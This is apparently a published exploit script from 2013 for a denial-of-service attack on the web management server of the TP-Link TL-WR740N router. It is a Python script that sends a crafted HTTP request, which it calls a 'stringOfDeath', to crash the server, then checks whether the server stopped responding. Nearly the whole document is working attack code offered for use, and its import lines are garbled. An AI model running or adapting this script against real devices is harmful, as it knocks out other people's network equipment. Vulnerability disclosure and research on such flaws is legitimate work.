# Exploit title: 150M Wireless Lite N Router HTTP DoS # Date: 11/29/2013 # Exploit Author: Dino Caus # Hardware Link: http://www.tp-link.com/en/products/details/?model=TL-WR740N # Vendor Homepage: http://www.tp-link.com/ # Contact: dincaus at gmail.com # Firmware Version: 3.12.11 Build 120320 Rel.51047n # Description: 150M Wireless Lite N Router has HTTP server through user manage settings for this router. If you lunch attack on this HTTP Server you can crash this server so that anyone can access to this management. # Usage: python TP_Link_DoS.py <IP> <Port> # 150M Wireless Lite N Router, Model No. TL-WR740N / TL-WR740ND sending HTTP request with the headers inserted # below in the script will crash HTTP Server. #!/usr/bin/python import socket import import sys urllib2 host = "" port = 0 if(len(sys.argv) >= 2): host = sys.argv[1] port = sys.argv[2] else: print "Invalid number of the arguments." print "Usage <server> <port>" exit(1) print "Connecting on ",host,":",port s = socket.socket(); stringOfDeath = "GET / HTTP/1.1\r\n"; stringOfDeath = stringOfDeath + "Accept-Encoding: identity\r\n"; stringOfDeath = stringOfDeath + "Host: "+ host + "\r\n"; stringOfDeath = stringOfDeath + "Connection: close\r\n"; stringOfDeath = stringOfDeath + "User-Agent: PythonLib/2.7\r\n"; s.connect((host,int(port))) print "Sending packet..." s.send(stringOfDeath) print "Packet sent." print "Check if router http server down..." try: response = urllib2.urlopen("http://"+host+":"+port,None,5) response.read() except socket.timeout: print "Timeout occured, http server probaly down." exit(1)